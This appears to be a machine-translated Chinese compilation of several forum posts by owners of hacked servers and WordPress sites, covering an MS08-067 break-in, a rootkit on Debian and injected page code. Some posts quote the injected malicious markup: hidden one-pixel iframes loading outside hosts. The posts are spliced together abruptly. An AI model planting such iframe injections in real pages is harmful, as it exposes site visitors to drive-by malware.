我有一台装有 IIS6、SQL Server 2005、MySQL 5 和 PHP 4.3 的 Windows Server 2003 SP2 机器。这不是生产机器,而是通过域名向世界公开。机器上启用了远程桌面,并且有两个管理帐户在其上处于活动状态。
今天早上我发现机器已经注销,登录文本框中仍然有一个未知的用户名。经过进一步调查,我发现已创建两个 Windows 用户,已卸载防病毒软件,并将少量 .exe 文件放入 C: 驱动器。
我想知道的是,我应该采取什么步骤来确保这种情况不再发生,以及我应该关注的领域来确定进入的途径。我已经检查了 netstat -a 以查看哪些端口是打开的,并且那里没有任何奇怪的地方。我确实在 MySQL 的数据文件夹中找到了未知文件,我认为这可能是入口点,但我不确定。
我非常感谢对服务器黑客进行良好的事后分析的步骤,以便我将来可以避免这种情况。
调查后审查
经过一番调查,我想我知道发生了什么。首先,在 08 年 8 月至 09 年 10 月的时间范围内,机器尚未联机。在此期间,发现了一个安全漏洞,即MS08-067 漏洞。“这是一个远程执行代码漏洞。成功利用此漏洞的攻击者可以远程完全控制受影响的系统。在基于 Microsoft Windows 2000、基于 Windows XP 和基于 Windows Server 2003 的系统上,攻击者可以利用此漏洞无需身份验证即可通过 RPC 运行,并且可以运行任意代码。” 2008 年 10 月发布的 KB958644 安全更新修复了此漏洞。
由于当时机器处于离线状态,错过了这次更新,我相信这个漏洞是在 09 年 10 月机器重新上线后不久被利用的。我发现对一个被描述为后门程序的 bycnboy.exe 程序的引用,该程序会对受感染的系统造成严重破坏。机器上线后不久,自动更新安装了补丁,关闭了远程控制系统的能力。由于后门现已关闭,我相信攻击者随后在该机器上创建了物理帐户,并能够再使用该机器一周,直到我注意到发生了什么。
在积极清除恶意代码、.exes 和 .dlls,删除自托管网站和用户帐户后,机器现在再次处于工作状态。在不久的将来,我将监视系统并查看服务器日志,以确定事件是否重复发生。
感谢您提供的信息和步骤。
可能重复:
我的服务器被黑了 紧急情况
上周末我公司的网站被黑了。
他们在周五晚上做了最好的事情,所以我们只在周一早上才注意到攻击。有趣的是,我们最近从 Windows 切换到 Linux,因为它应该更稳定和安全。去搞清楚。是的,我们在 Firefox 和 Chrome 上将我们列入黑名单。
由于我不是 Linux 专家,因此我正在寻求有关如何避免将来出现此类问题的建议。您采取了哪些措施来保护您的系统?看起来我们的密码很弱,但是在几次登录失败后,Linux 不应该阻止该帐户吗?他们尝试了 20 多种组合......
除此之外,我正在寻找一种类似于 pingdom 但适用于安全性的工具(或服务)。如果我的网站遭到黑客入侵,请提醒我。有这种事吗?黑客监视器?:)
另一件事,您如何将此类问题通知您的客户?你只是无视并希望没有人注意到吗?电子邮件解释发生了什么?
*以匿名身份发布以避免对我的公司造成更多不良影响,这已经很糟糕了...
最终更新:
过去几周事情一直很平静,让我学到了更多关于网站安全和风险的知识。这是我的故事版本 -
我使用的是旧版本的 wordpress,可能是这个人从 google 上发现了我。我认为这是脚本攻击。很难说安全实际上是如何以及何时受到损害的,我在 2009 年 11 月 5 日注意到了这一点。虽然我当时采取了一些安全措施(如下所述),但总是有可能我错过了重新更改 wordpress 密码的可能性。我格式化了我的工作电脑。
现在我已经从托管中删除了所有不需要的 php 脚本,使管理部分只能对我的 IP 访问,阻止了属于越南的特定 IP 范围。每日备份和其他东西。问题是涉及的变量太多,很难跟踪每个变量。主要课程是为此做好准备。:)
我正在使用 GoDaddy 的共享托管计划并运行 WordPress 网站。我的网站第一次被黑是在 2009 年 11 月 5 日,当时黑客用自己的广告替换了我的广告。我以为这是因为我对安全的懒惰,但我错了。
我格式化了我的电脑并重新设置了一切。将 ESET NOD32 替换为 Microsoft Security Essentials。升级到最新版本的 WordPress。更改了所有密码。设置一个新的数据库。以及我在这里和那里阅读的其他与安全相关的内容。事情运行良好,直到今天我的网站再次遭到黑客攻击。
上次,那家伙玩了很多文件,特意修改了footer.php和所有与广告相关的文件。但这一次他只是走对了地方,替换成了下面的代码——
<IFRAME height=1 src="http://blackberryrss.com/check.html" frameBorder=0 width=1></IFRAME>
<form action="http://www.google.com/cse" id="cse-search-box">
<div>
<input type="hidden" name="cx" value="partner-pub-2815780429722377:hhm6d0-6wfw" />
<input type="hidden" name="ie" value="ISO-8859-1" />
<input type="text" name="q" size="31" />
<input type="submit" name="sa" value="Search" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script> …入侵者试图在我的盒子上安装 rootkit。我想要它回来,然后重新安装。如何替换攻击者安装的无效文件?我不能 chown 或 rm 他们。它在 rm、chown、mv 或类似文件上显示“不允许操作”。我正在运行 debian sarge。
编辑:chattr 显示了一些标志(s、i 和 a),但删除它们无济于事。再次编辑:我的错,抱歉,chattr 确实有效。我不知道我看到了。
两次,我在 index.php 的顶部发现了奇怪的代码。
第一次,是这样的:
<iframe src="http://ntwportal.com/" width="2" height="4"></iframe>
然后这个:
<iframe src="http://gtwdnsglobe.org/" width="2" height="4"></iframe>
这是怎么回事?我有安全漏洞吗?
拥有 FTP 访问权限(据我所知)的人不会这样做。我最近部署了一个新站点,这种情况仍在发生。